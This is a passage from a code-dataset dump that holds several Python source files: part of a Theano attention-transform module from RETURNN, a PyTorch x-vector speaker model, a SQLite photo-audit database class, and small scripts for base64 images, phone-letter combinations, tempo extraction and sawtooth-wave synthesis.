'conv2d':\n F = self.item('F',i)\n context = F.shape[3]\n padding = T.zeros((2,context/2,C.shape[1]),'float32')\n att = T.concatenate([padding, T.stack([self.item('att',i), w_i]), padding],axis=1) # 2TB\n v_i = T.nnet.sigmoid(T.dot(T.nnet.conv2d(border_mode='valid',\n input=att.dimshuffle(2,'x',0,1), # B12T\n filters=F).dimshuffle(3,0,2,1),self.item('U',i)).reshape((C.shape[0],C.shape[1])))\n w_i *= v_i\n w_i = w_i / w_i.sum(axis=0, keepdims=True)\n elif self.attrs['momentum'] == 'mono': # gating function\n idx = T.arange(z_i.shape[0],dtype='float32').dimshuffle(0,'x').repeat(w_i.shape[1],axis=1) # TB\n d_i = idx - T.sum(self.item('att', i) * idx,axis=0,keepdims=True)\n f_i = 
T.nnet.sigmoid(T.dot(T.tanh(T.dot(d_i.dimshuffle(0,1,'x'), self.item('D_in', i))), self.item(\"D_out\", i)) + self.item('Db_out',i))[:,:,0]\n w_i = T.exp(-z_i) * f_i * I\n w_i = w_i / w_i.sum(axis=0, keepdims=True)\n self.glimpses[i].append(T.sum(C * w_i.dimshuffle(0,1,'x').repeat(C.shape[2],axis=2),axis=0))\n if self.attrs['smooth']:\n updates[self.state_vars['datt_%d' % i]] = w_i - self.state_vars['att_%d' % i]\n if self.attrs['store']:\n updates[self.state_vars['att_%d' % i]] = theano.gradient.disconnected_grad(w_i)\n if self.attrs['align']:\n Q,K = self.align(w_i,self.item(\"Q\", i))\n updates[self.state_vars['Q_%d' % i]] = Q\n updates[self.state_vars['K_%d' % i]] = K\n if self.attrs['memory'] > 0:\n M = self.item('M',i)\n z_r = self.distance(M, H)\n w_m = self.softmax(z_r, T.ones_like(M[0]))\n inp += T.dot(T.sum(w_m*M,axis=0), self.item('W_mem_in',i))\n v_m = T.nnet.sigmoid(T.dot(H, self.item('W_mem_write', i))).dimshuffle('x',0, 1).repeat(M.shape[0],axis=0)\n mem = H.dimshuffle('x',0,1).repeat(self.attrs['memory'],axis=0)\n updates[self.state_vars['M_%d' % i]] = T.sum((numpy.float32(1) - v_m) * M.dimshuffle(0,'x',1).repeat(v_m.shape[1],axis=1) + v_m * mem,axis=1)\n if self.attrs['accumulator'] == 'rnn':\n def rnn(x_t, w_t, c_p):\n c = x_t * w_t + c_p * (numpy.float32(1.) - w_t)\n return T.switch(T.ge(c, 0), c, T.exp(c) - 1)\n zT, _ = theano.scan(rnn, sequences=[B,w_i.dimshuffle(0, 1, 'x').repeat(B.shape[2], axis=2)],\n outputs_info = [T.zeros_like(B[0])])\n z = zT[-1]\n else:\n if self.attrs['nbest'] == 1:\n z = B[T.argmax(w_i,axis=0),T.arange(w_i.shape[1])]\n else:\n z = T.sum(B * w_i.dimshuffle(0, 1, 'x').repeat(B.shape[2], axis=2), axis=0)\n if self.attrs['loss']:\n updates[self.state_vars['catt_%d' % i]] = -T.sum(T.log(w_i[T.cast(self.item('iatt', i),'int32')[T.cast(self.n,'int32')],T.arange(w_i.shape[1],dtype='int32')]),axis=0)\n inp += T.dot(z, W_att_in) + b_att_in\n ifelse(T.eq(T.mod(self.n[0],self.attrs['ndec']),0), inp, T.zeros((self.n.shape[0],self.layer.attrs['n_out'] * 4),'float32'))\n return inp, updates\n\n def cost(self):\n val = 0\n if self.attrs['smooth']:\n penalty = T.constant(0,'float32')\n for i in range(len(self.base)):\n penalty += theano.tensor.extra_ops.cumsum(self.get_state_vars_seq(self.state_vars['datt_%d' % i]),axis=0)\n val += T.sum(T.maximum(penalty,T.zeros_like(penalty)))\n if self.attrs['loss']:\n for i in range(len(self.base)):\n val += T.sum(self.get_state_vars_seq(self.state_vars['catt_%d' % i]))\n return val\n\n\nclass AttentionTime(AttentionList):\n \"\"\"\n Concatenate time-aligned base element into single list element\n \"\"\"\n name = \"attention_time\"\n def make_base(self):\n self.base = [T.concatenate([b.output[::b.attrs['direction']] for b in self.layer.base], axis=2)]\n self.base[0].index = self.layer.base[0].index\n self.base[0].output = self.base[0]\n self.base[0].attrs = { 'n_out' : sum([b.attrs['n_out'] for b in self.layer.base]), 'direction' : 1 }\n\n def create_vars(self):\n self.make_base()\n super(AttentionTime, self).create_vars()\n\n def default_updates(self):\n self.make_base()\n self.glimpses = [ [] ] * len(self.base)\n self.n_glm = max(self.attrs['glimpse'],1)\n return { self.n : self.n + T.constant(1,'float32') }\n\n\nclass AttentionTree(AttentionList):\n \"\"\"\n attention over hierarchy of bases in different time resolutions\n \"\"\"\n name = \"attention_tree\"\n def attend(self, y_p):\n B = self.custom_vars['B_0']\n for g in range(self.n_glm):\n prev = []\n for i in range(len(self.base)-1,-1,-1):\n B, C, I, H, W_att_in, 
b_att_in = self.get(y_p, i, g)\n h_p = sum([H] + prev) / T.constant(len(self.base)-i,'float32')\n w = self.softmax(self.distance(C, h_p), I)\n prev.append(T.sum(C * w.dimshuffle(0,1,'x').repeat(C.shape[2],axis=2),axis=0))\n self.glimpses[i].append(prev[-1])\n return T.dot(T.sum(B * w.dimshuffle(0,1,'x').repeat(B.shape[2],axis=2),axis=0), self.custom_vars['W_att_in_0']), {}\n\n\nclass AttentionBin(AttentionList):\n \"\"\"\n pruning of hypotheses in base[0] by attending over versions in time lower resolutions\n \"\"\"\n name = \"attention_bin\"\n\n def attend(self, y_p):\n updates = self.default_updates()\n for g in range(self.attrs['glimpse']):\n for i in range(len(self.base)-1,-1,-1):\n factor = T.constant(self.base[i].attrs['factor'][0], 'int32') if i > 0 else 1\n B, C, I, H, W_att_in, b_att_in = self.get(y_p, i, g)\n if i == len(self.base) - 1:\n z_i = self.distance(C, H)\n else:\n length = T.cast(T.max(T.sum(I,axis=0))+1,'int32')\n ext = T.cast(T.minimum(ext/factor,T.min(length)),'int32')\n def pick(i_t, ext):\n pad = T.minimum(i_t+ext, B.shape[0]) - ext\n return T.concatenate([T.zeros((pad,), 'int8'), T.ones((ext,), 'int8'), T.zeros((B.shape[0]-pad-ext+1,), 'int8')], axis=0)\n idx, _ = theano.map(pick, sequences = [pos/factor], non_sequences = [ext])\n idx = (idx.dimshuffle(1,0)[:-1].flatten() > 0).nonzero()\n C = C.reshape((C.shape[0]*C.shape[1],C.shape[2]))[idx].reshape((ext,C.shape[1],C.shape[2]))\n z_i = self.distance(C, H)\n I = I.reshape((I.shape[0]*I.shape[1],))[idx].reshape((ext,I.shape[1]))\n if i > 0:\n pos = T.argmax(self.softmax(z_i,I),axis=0) * factor\n ext = factor\n else:\n w_i = self.softmax(z_i,I)\n B = B.reshape((B.shape[0]*B.shape[1],B.shape[2]))[idx].reshape((ext,B.shape[1],B.shape[2]))\n proto = T.sum(B * w_i.dimshuffle(0,1,'x').repeat(B.shape[2],axis=2),axis=0)\n for i in range(len(self.base)):\n self.glimpses[i].append(proto)\n return T.dot(proto, self.custom_vars['W_att_in_0']), updates\n\n\nclass AttentionTimeGauss(RecurrentTransformBase):\n name = \"attention_time_gauss\"\n\n def create_vars(self):\n layer = self.layer\n base = layer.base\n assert base, \"attention networks are only defined for decoder networks\"\n\n n_out = layer.attrs['n_out']\n n_in = sum([e.attrs['n_out'] for e in base])\n src = [e.output for e in base]\n\n if len(src) == 1:\n self.B = src[0]\n else:\n self.B = T.concatenate(src, axis=2) # base (output of encoder). 
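Multiple bases are concatenated along the feature axis, keeping shape 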
(time,batch,encoder-dim)\n self.add_input(self.B, name=\"B\")\n self.B_index = self.layer.base[0].index # not an input\n self.B_times = self.add_input(T.cast(T.sum(self.B_index, axis=0), dtype=\"float32\"), \"B_times\") # float32 for gpu\n\n self.W_att_re = self.add_param(layer.create_random_uniform_weights(n=n_out, m=2, p=n_out, name=\"W_att_re\"))\n self.b_att_re = self.add_param(layer.create_bias(2, name='b_att_re'))\n self.W_att_in = self.add_param(layer.create_random_uniform_weights(n=n_in, m=n_out * 4, name=\"W_att_in\"))\n self.W_state_in = self.add_param(layer.create_random_uniform_weights(n=3, m=n_out * 4, name=\"W_state_in\"))\n\n self.c = self.add_state_var(T.constant(0, dtype=\"float32\"), name=\"c\") # float32 for gpu\n self.t = self.add_state_var(T.zeros((self.B.shape[1],), dtype=\"float32\"), name=\"t\") # (batch,)\n\n def step(self, y_p):\n # y_p is (batch,n_out)\n # B is (time,batch,n_in)\n # B_index is (time,batch)\n attribs = self.layer.attrs[\"recurrent_transform_attribs\"]\n n_batch = self.B.shape[1]\n dt_min = T.constant(attribs.get(\"dt_min\", 0.5), dtype=\"float32\")\n dt_max = T.constant(attribs.get(\"dt_max\", 1.5), dtype=\"float32\")\n std_min = T.constant(attribs.get(\"std_min\", 1), dtype=\"float32\")\n std_max = T.constant(attribs.get(\"std_max\", 2), dtype=\"float32\")\n n_beam = T.constant(attribs.get(\"beam\", 20), dtype=\"float32\")\n B_times = self.B_times\n\n b = self.b_att_re.dimshuffle('x', 0) # (batch,2)\n a = T.nnet.sigmoid(T.dot(y_p, self.W_att_re) + b) # (batch,2)\n dt = dt_min + a[:, 0] * (dt_max - dt_min) # (batch,)\n std = std_min + a[:, 1] * (std_max - std_min) # (batch,)\n std_t_bc = std.dimshuffle('x', 0) # (beam,batch)\n\n t = self.t # (batch,). that's the old t, which starts at zero.\n t_bc = t.dimshuffle('x', 0) # (beam,batch)\n\n t_round = T.round(t) # (batch,). +0.5 so that a later int-cast will be like round().\n start_idxs = t_round - n_beam / numpy.float32(2) # (batch,), beams, centered around t_int\n idxs_0 = T.arange(n_beam).dimshuffle(0, 'x') # (beam,batch). all on cpu, but static, no round trip\n idxs = T.cast(idxs_0, dtype=\"float32\") + start_idxs.dimshuffle('x', 0) # (beam,batch). centered around t_int\n\n # gauss window\n f_e = T.exp(-(T.cast(t_bc - idxs, dtype=\"float32\") ** 2) / (2 * std_t_bc ** 2)) # (beam,batch)\n norm = T.constant(1.0, dtype=\"float32\") / (std_t_bc * T.constant(sqrt(2 * pi), dtype=\"float32\")) # (beam,batch)\n w_t = f_e * norm # (beam,batch)\n w_t_bc = w_t.dimshuffle(0, 1, 'x') # (beam,batch,n_in)\n\n B_beam = multi_batch_beam(self.B, start_idxs, B_times, n_beam, \"wrap_around\")\n att = T.sum(B_beam * w_t_bc, axis=0, keepdims=False) # (batch,n_in)\n z_re = T.dot(att, self.W_att_in) # (batch,n_out*4)\n\n t_frac = T.cast((self.t + 1) / (self.c.dimshuffle('x') + 1), dtype=\"float32\") # (batch,)\n t_frac_row = t_frac.reshape((n_batch, 1)) # (batch,1)\n state_t_frac = T.constant(1, dtype=\"float32\").dimshuffle('x', 'x') - t_frac_row # (batch,1)\n state = T.concatenate([state_t_frac, a], axis=1) # (batch,3)\n z_re += T.dot(state, self.W_state_in)\n\n return z_re, {self.t: self.t + dt, self.c: self.c + 1}\n\n def cost(self):\n t_seq = self.get_state_vars_seq(self.t) # (time,batch)\n # Get the last frame. 
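t_seq holds one attention position per decoder step and batch entry. 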
-2 because the last update is not used.\n B_index = self.B_index\n B_times = T.sum(B_index, axis=0)\n #B_times = T.printing.Print(\"B_times\")(B_times)\n B_last = B_times - 1 # last frame idx of the base seq\n O_index = self.layer.index\n O_times = T.sum(O_index, axis=0)\n #O_times = T.printing.Print(\"O_times\")(O_times)\n O_last = O_times - 2 # last frame. one less because initial states are in extra vector.\n # We need an extra check for small batches, would crash otherwise.\n O_last_clipped = T.clip(O_last, 0, t_seq.shape[0] - 1)\n batches = T.arange(t_seq.shape[1]) # (batch,)\n t_last = T.switch(T.lt(O_last, 0),\n self.state_vars_initial[\"t\"],\n t_seq[O_last_clipped[batches], batches]) # (batch,)\n #t_last = T.printing.Print(\"t_last\")(t_last)\n return T.sum((t_last - B_last) ** 2)\n\n\ndef get_dummy_recurrent_transform(recurrent_transform_name, n_out=5, n_batches=2, n_input_t=2, n_input_dim=2):\n \"\"\"\n This function is a useful helper for testing/debugging.\n :type recurrent_transform_name: str\n :rtype: RecurrentTransformBase\n \"\"\"\n cls = transform_classes[recurrent_transform_name]\n from NetworkRecurrentLayer import RecurrentUnitLayer\n from NetworkBaseLayer import SourceLayer\n if getattr(RecurrentUnitLayer, \"rng\", None) is None:\n RecurrentUnitLayer.initialize_rng()\n index = theano.shared(numpy.array([[1] * n_batches] * n_input_t, dtype=\"int8\"), name=\"i\")\n x_out = theano.shared(numpy.array([[[1.0] * n_input_dim] * n_batches] * n_input_t, dtype=\"float32\"), name=\"x\")\n layer = RecurrentUnitLayer(n_out=n_out, index=index, sources=[],\n base=[SourceLayer(n_out=x_out.get_value().shape[2], x_out=x_out, index=index)],\n attention=recurrent_transform_name)\n assert isinstance(layer.recurrent_transform, cls)\n return layer.recurrent_transform\n\n\ntransform_classes = {}; \":type: dict[str,class]\"\ntransforms_by_id = {}; \":type: dict[int,RecurrentTransformBase]\"\n\ndef _setup():\n import inspect\n for clazz in globals().values():\n if not inspect.isclass(clazz): continue\n if not issubclass(clazz, RecurrentTransformBase): continue\n if clazz.name is None: continue\n transform_classes[clazz.name] = clazz\n\n_setup()\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/rwth-i6_returnn/returnn-master/RecurrentTransform.py","file_name":"RecurrentTransform.py","file_ext":"py","file_size_in_byte":38186,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"}
{"seq_id":"14834075252","text":"import os,sys\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport h5py\nfrom tdnn import TDNN\nfrom adacos import AdaCos\n\ndef get_mask(tensor, lengths):\n mask = np.zeros((tensor.shape[0], tensor.shape[1], 1))\n\n for n in range(len(lengths)):\n l=lengths[n]\n if l > tensor.shape[1]:\n l=tensor.shape[1]\n mask[n, :l, :] = 1. # mask only sample n up to its own length (mask[n:, ...] would leak lengths across the batch)\n\n return torch.from_numpy(mask.astype(np.float32)).clone()\n\ndef stats_with_mask(tensor, mask):\n mean = torch.div(torch.sum(tensor*mask, dim=1, keepdim=True),torch.sum(mask, dim=1, keepdim=True))\n var = torch.square(tensor-mean)\n var = torch.sum(var*mask, dim=1, keepdim=True)\n var = torch.div(var, torch.sum(mask, dim=1, keepdim=True)+1.0e-8)\n std = torch.sqrt(var)\n if mean.shape[0] < 2:\n # batch size 1: squeeze away the time axis, then restore the batch axis\n mean, std = mean.squeeze(), std.squeeze()\n mean, std = mean.unsqueeze(0), std.unsqueeze(0)\n else:\n mean, std = mean.squeeze(), std.squeeze()\n return mean, std\n\nclass X_vector(nn.Module):\n def __init__(self, input_dim = 40, class_num=2):\n super(X_vector, 
self).__init__()\n\n self.tdnn1 = TDNN(input_dim=input_dim, output_dim=512, context_size=5, dilation=1,dropout_p=0.5)\n self.tdnn2 = TDNN(input_dim=512, output_dim=512, context_size=3, dilation=2,dropout_p=0.5)\n self.tdnn3 = TDNN(input_dim=512, output_dim=512, context_size=3, dilation=3,dropout_p=0.5)\n self.tdnn4 = TDNN(input_dim=512, output_dim=512, context_size=4, dilation=4,dropout_p=0.5)\n self.segment5 = nn.Linear(512, 1500)\n self.segment6 = nn.Linear(3000, 512)\n self.segment7 = nn.Linear(512, 512)\n\n self.criterion = AdaCos(512, class_num)\n\n self.id2spk={}\n with open('speakers.txt', 'r') as f:\n lines = f.readlines()\n for line in lines:\n spk = line.strip().split()[0]\n id = int(line.strip().split()[1])\n self.id2spk[id] = spk\n \n def forward(self, inputs, speakers=None, lengths=None):\n tdnn1_out = self.tdnn1(inputs)\n tdnn2_out = self.tdnn2(tdnn1_out)\n tdnn3_out = self.tdnn3(tdnn2_out)\n tdnn4_out = self.tdnn4(tdnn3_out)\n out = self.segment5(tdnn4_out) # (b, t, f)\n if lengths is None:\n mean = torch.mean(out,1) # (b, f)\n std = torch.std(out,1) # (b, f)\n else:\n mask=get_mask(out, lengths).cuda()\n mean, std = stats_with_mask(out, mask)\n stat_pooling = torch.cat((mean,std),1) # (b, fx2)\n segment6_out = self.segment6(stat_pooling)\n x_vec = self.segment7(segment6_out)\n #return x_vec\n loss, logits = self.criterion(x_vec, speakers)\n \n return loss, logits\n \n def predict(self, x):\n with torch.no_grad():\n x -= self.mean\n x /= self.std\n x = torch.from_numpy(x).clone().float()\n x = x.unsqueeze(0)\n _, pred = self.forward(x.cuda())\n idx = torch.argmax(pred, dim=1).to('cpu').detach().numpy().copy().astype(int)[0]\n \n return self.id2spk[idx]\n \n def top_k(self, x, k=5):\n with torch.no_grad():\n x -= self.mean\n x /= self.std\n x = torch.from_numpy(x).clone().float()\n x = x.unsqueeze(0)\n _, pred = self.forward(x.cuda())\n _, idx = torch.topk(pred, k)\n idx = idx.to('cpu').detach().numpy().copy().astype(int).squeeze().tolist()\n return [ self.id2spk[i] for i in idx ] # loop variable renamed so it does not shadow the parameter k\n \n def set_stats(self, mean, std):\n self.mean = mean\n self.std = std\n \n def load_model(self, file):\n # load into this module itself; the class has no self.model attribute\n self.load_state_dict(torch.load(file, map_location=torch.device('cpu')), strict=False)\n\n def get_speaker(self, k):\n return self.id2spk[k]\n","repo_name":"akio-kobayashi/SimpleSpeaker","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"39104288385","text":"import lrcat\nimport sqlite3\nimport sys\nimport os\nimport media_ext\n\nclass AuditDb:\n def __init__(self, fname=\"audit.sqlite3\", drop_flag=False):\n if os.path.exists(fname)==False:\n drop_flag=True # force all tables to be reconstructed\n #end\n \n self.con = sqlite3.connect(fname)\n cur = self.con.cursor()\n\n if drop_flag:\n self.create_table_lr_files()\n self.create_table_picasafiles()\n self.create_table_dirpaths()\n #end\n\n self.path_cache = {}\n\n def create_table_dirpaths(self):\n print(\"deleting table: dirpaths\");\n cur = self.con.cursor()\n cmd = \"\"\"\n DROP TABLE IF EXISTS dirpaths;\n \"\"\"\n\n cur.execute(cmd)\n cmd = \"\"\"\n CREATE TABLE IF NOT EXISTS dirpaths(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n root_path TEXT NOT NULL,\n path_from_root TEXT NOT NULL UNIQUE);\n \"\"\"\n\n cur.execute(cmd)\n return\n\n def create_table_lr_files(self):\n print(\"deleting table: lr_files\");\n cur = self.con.cursor()\n cmd = \"\"\"\n DROP TABLE IF EXISTS lr_files;\"\"\"\n 
cur.execute(cmd)\n\n cmd = \"\"\"\n CREATE TABLE IF NOT EXISTS lr_files(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n path_id INTEGER NOT NULL,\n extension TEXT,\n picasa_file_id INTEGER,\n filename TEXT NOT NULL);\n \"\"\"\n cur.execute(cmd)\n return\n\n def create_table_picasafiles(self):\n print(\"deleting table: picasa_files\");\n cur = self.con.cursor()\n cmd = \"\"\"\n DROP TABLE IF EXISTS picasa_files;\n \"\"\"\n cur.execute(cmd)\n\n cmd = \"\"\"\n CREATE TABLE IF NOT EXISTS picasa_files(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n path_id INTEGER NOT NULL,\n extension TEXT,\n lr_file_id INTEGER,\n filename TEXT NOT NULL);\n \"\"\"\n cur.execute(cmd)\n return\n\n def normalize_path_from_root(self, path_from_root):\n \"\"\"\n normalize path_from_root wrt begin and end path separators\n\n returns normalized path\n \"\"\"\n if path_from_root[0:1]=='/':\n path_from_root=path_from_root[1:]\n #end\n\n if path_from_root[-1] != '/':\n path_from_root = path_from_root + '/'\n #end\n\n return path_from_root\n \n \n def register_path_from_root(self, path_from_root, root_dir):\n \"\"\"\n given path_from_root (a string), return the \n corresponding row ID (an integer) from the database.\n \n the row ID is either an existing table entry or a new table entry.\n\n returns row ID (integer)\n \"\"\"\n path_from_root = self.normalize_path_from_root(path_from_root)\n #\n # try reading rowid from cache\n try:\n rowid = self.path_cache[path_from_root]\n except KeyError:\n rowid = -1\n #end\n\n #\n # try to retrieve existing row ID\n if rowid < 0:\n cur = self.con.cursor()\n\n cmd = f\"\"\"\n SELECT * FROM dirpaths WHERE path_from_root=\"{path_from_root}\" \"\"\"\n cur.execute(cmd)\n results = cur.fetchall()\n assert len(results) <= 1\n\n if len(results)==1:\n rowid = results[0][0]\n #\n # add to cache\n self.path_cache[path_from_root] = rowid\n #end\n #end\n\n #\n # create new table entry\n if rowid < 0:\n cmd = f\"\"\"\n INSERT INTO dirpaths(root_path, path_from_root) VALUES (\"{root_dir}\", \"{path_from_root}\")\n \"\"\"\n cur.execute(cmd)\n rowid = cur.lastrowid\n self.con.commit()\n\n #\n # add to cache\n self.path_cache[path_from_root] = rowid\n # end\n\n assert rowid >= 0\n return rowid\n\n def commit(self):\n self.con.commit()\n return\n\n def extract_extension(self, fname):\n (_, ext) = os.path.splitext(fname)\n ext = ext.lower()\n return ext\n \n def insert_into_lr_files(self, path_id, fname):\n ext = self.extract_extension(fname)\n cur = self.con.cursor()\n cmd = f\"\"\"\n INSERT INTO lr_files(path_id, extension, filename) VALUES ({path_id}, \"{ext}\", \"{fname}\")\"\"\"\n cur.execute(cmd)\n\n return\n\n def insert_into_picasa_files(self, path_id, fname):\n ext = self.extract_extension(fname)\n \n cur = self.con.cursor()\n cmd = f\"\"\"\n INSERT INTO picasa_files(path_id, extension, filename) VALUES ({path_id}, \"{ext}\",\"{fname}\")\"\"\"\n cur.execute(cmd)\n\n return\n\n def update_picasa_files_lr_id(self, picasa_id, lr_id):\n cmd = f\"\"\"\n UPDATE picasa_files\n SET lr_file_id={lr_id}\n WHERE picasa_files.id={picasa_id}\"\"\"\n\n cur = self.con.cursor()\n cur.execute(cmd)\n\n return\n\n def update_lr_files_picasa_id(self, lr_id, picasa_id):\n cmd = f\"\"\"\n UPDATE lr_files\n SET picasa_file_id={picasa_id}\n WHERE lr_files.id={lr_id}\"\"\"\n\n cur = self.con.cursor()\n cur.execute(cmd)\n\n return\n \n\n def get_num_db_entries(self):\n \"\"\"\n return dictionary containing number of entries per auditdb table\n \"\"\"\n cur = self.con.cursor()\n\n cmd = \"\"\"SELECT * FROM lr_files\"\"\"\n 
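# NOTE (editor's aside): counting by fetching every row holds the whole table in memory; a SELECT count(*) query would be lighter, but the original behaviour is kept.\n 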
cur.execute(cmd)\n results = cur.fetchall()\n num_lr = len(results)\n\n \n # OMIT .picasaoriginals and .converted directories!\n # OMIT non-media files, e.g. .db\n cmd = \"\"\"\n SELECT picasa_files.id FROM picasa_files\n INNER JOIN dirpaths\n WHERE picasa_files.path_id = dirpaths.id\n AND dirpaths.path_from_root NOT LIKE \"%picasaoriginals/\"\n AND dirpaths.path_from_root NOT LIKE \"%converted/\"\n AND \n \"\"\"\n ext = media_ext.IGNORABLE_EXT_TUPLE[0]\n cmd = cmd + f\"\"\"picasa_files.extension NOT LIKE \"{ext}\" \"\"\"\n for ext in media_ext.IGNORABLE_EXT_TUPLE[1:]:\n cmd = cmd + f\"\"\"AND picasa_files.extension NOT LIKE \"{ext}\" \"\"\"\n #end\n #print(cmd)\n \n cur.execute(cmd)\n results = cur.fetchall()\n num_picasa = len(results)\n \n cmd = \"\"\"\n SELECT * FROM dirpaths\n WHERE dirpaths.path_from_root NOT LIKE \"%picasaoriginals/\"\n AND dirpaths.path_from_root NOT LIKE \"%converted/\"\n \"\"\"\n cur.execute(cmd)\n results = cur.fetchall()\n num_paths = len(results)\n\n d = {'num_paths': num_paths, 'num_lr':num_lr, 'num_picasa':num_picasa}\n return d\n\n\n \n \n \n","repo_name":"robyu/lr-audit","sub_path":"auditdb.py","file_name":"auditdb.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"42630716983","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n @Time : 2018/9/30 11:29 AM\n @Author : hanxiaocu\n @File : dataToImage.py\n \n \n\"\"\"\nimport base64\n\ndef dataToImage():\n data = \"\"\n imgdata=base64.b64decode(data)\n file=open('2.jpg','wb')\n file.write(imgdata)\n file.close()\n\n\n\ndef imageToData():\n f=open('723.png','rb') #open the image file in binary mode\n ls_f=base64.b64encode(f.read()) #read the file contents and convert them to base64\n f.close()\n print(ls_f)\n\n\nif __name__ == '__main__':\n dataToImage()","repo_name":"SmallBlackBeans/pythonPractice","sub_path":"hello/小工具/dataToImage.py","file_name":"dataToImage.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"18855358935","text":"class Solution:\n\n def search(self, digits, k, s, res, mp):\n if k == len(digits):\n res.append(s)\n else:\n for d in mp[digits[k]]:\n self.search(digits, k+1, s+d, res, mp)\n\n\n def letterCombinations(self, digits):\n \"\"\"\n :type digits: str\n :rtype: List[str]\n \"\"\"\n if digits == '':\n return []\n mp = {'0':['0'],'1':['1'], '2':['a','b','c'],'3':['d','e','f'],'4':['g','h','i'],'5':['j','k','l'],\n '6':['m','n','o'],'7':['p','q','r','s'],'8':['t','u','v'],'9':['w','x','y','z']}\n res = []\n self.search(digits, 0, '', res, mp)\n return res\n","repo_name":"imju/codepath_in_week4","sub_path":"Recursion_LetterPhone.py","file_name":"Recursion_LetterPhone.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"8190463973","text":"from __future__ import print_function\nimport os\nimport librosa\n\n\n# from visualization import tempoVSautoCorrelation, dTempoOnTempogram\n\n\ndef getBeat(audioName, isDynamic):\n audioFileName = audioName + \".mp3\"\n OutputPath = os.path.join(os.getcwd(), 'sampleOutput', audioFileName)\n\n y, sr = librosa.load(OutputPath)\n onset_env = librosa.onset.onset_strength(y, sr=sr)\n\n tempo = librosa.beat.tempo(onset_envelope=onset_env, sr=sr)\n # If static tempo\n\n dtempo = librosa.beat.tempo(onset_envelope=onset_env, sr=sr, aggregate=None)\n # If dynamic tempo\n\n 
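# NOTE (editor's aside): librosa.beat.tempo returns a one-element array by default (a single global BPM estimate); with aggregate=None it returns one estimate per onset frame.\n\n 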
###############################################################################\n #\t*optional plotting\n #\ttempoVSautoCorrelation(tempo, 512)\n #\t\t-plotting estimated tempo VS Onset Auto Correlation\n #\t\t\t-param: static tempo, hop default\n #\n #\tdTempoOnTempogram(dtempo)\n #\t\t-plotting dynamic tempo estimates over a tempogram\n #\t\t\t-param: dynamic tempo\n ###############################################################################\n\n if isDynamic == 0:\n return tempo\n else:\n return dtempo\n","repo_name":"ttakasawa/Music_Play_Count_Estimator","sub_path":"Code/Python/FeatureExtraction/extractBeat.py","file_name":"extractBeat.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"71961231412","text":"import numpy as np\nimport scipy.io.wavfile\nimport scipy.signal\nimport matplotlib.pyplot as plt\n\n\nFREQUENCY = 1000.0\nMAX_AMPLITUDE = 0.5\nSAMPLING_RATE = 44100\nDURATION = 1.0\n#calculated max number of sine waves according to nyquist's theorem\nM = int(np.floor(SAMPLING_RATE / 2 / FREQUENCY))\nLENGTH = 8192\n\n\ndef main():\n #generate constructed and perfect sawtooth waves\n constructed_sawtooth_wave = construct_sawtooth()\n perfect_sawtooth_wave = perfect_sawtooth()\n #write them to wav files\n scipy.io.wavfile.write(\"constructed_sawtooth.wav\", SAMPLING_RATE, constructed_sawtooth_wave)\n scipy.io.wavfile.write(\"perfect_sawtooth.wav\", SAMPLING_RATE, perfect_sawtooth_wave)\n #plot the time domain graph\n plot_time_domain(constructed_sawtooth_wave, perfect_sawtooth_wave)\n #generate and plot the db_mag fft graph\n constructed_spec = get_power_spec(constructed_sawtooth_wave)\n perfect_spec = get_power_spec(perfect_sawtooth_wave)\n plot_db_mag(constructed_spec, perfect_spec)\n\n\n#construct the sawtooth wave using the formula given in handout\ndef construct_sawtooth():\n time = np.arange(0, DURATION, 1 / SAMPLING_RATE)\n wave = np.zeros(len(time))\n\n for i in range(1, M + 1):\n temp_wave = (1.0 / i) * np.sin(i * 2.0 * np.pi * time * FREQUENCY)\n wave = wave + temp_wave\n\n wave = wave * (-2.0 * MAX_AMPLITUDE / np.pi)\n return wave\n\n\ndef perfect_sawtooth():\n time = np.arange(0, DURATION, 1 / SAMPLING_RATE)\n perfect_wave = MAX_AMPLITUDE * scipy.signal.sawtooth(FREQUENCY * 2.0 * np.pi * time)\n return perfect_wave\n\n\ndef plot_time_domain(constructed, perfect):\n plt.xlabel(\"Time\")\n plt.ylabel(\"Amplitude\")\n\n plt.plot(constructed, c=\"blue\", label=\"Reconstructed Sawtooth\")\n plt.plot(perfect, c=\"red\", label=\"Perfect Sawtooth\")\n\n plt.legend()\n plt.xlim(0, 250)\n plt.savefig('Time-Domain Waves.png')\n\n\ndef get_power_spec(wave):\n wave = wave[:LENGTH]\n window = np.blackman(len(wave))\n fft = np.fft.fft(wave * window)\n fft = fft[:len(fft) // 2 + 1] # integer division: slice indices must be ints in Python 3\n magfft = np.abs(fft) / (np.sum(window) / 2.0)\n epsilon = np.power(10.0, -10)\n power_spec = 20.0 * np.log10(magfft + epsilon)\n return power_spec\n\n\ndef plot_db_mag(constructed, perfect):\n plt.clf()\n plt.xlabel(\"FFT bin\")\n plt.ylabel(\"dB\")\n plt.plot(constructed, c=\"blue\", label=\"Reconstructed Sawtooth\")\n plt.plot(perfect, c=\"red\", label=\"Perfect Sawtooth\")\n\n plt.legend()\n plt.xlim(0, 4000)\n plt.title('Sawtooth wave reconstruction with 22 sine waves')\n plt.savefig('dB-magnitude 
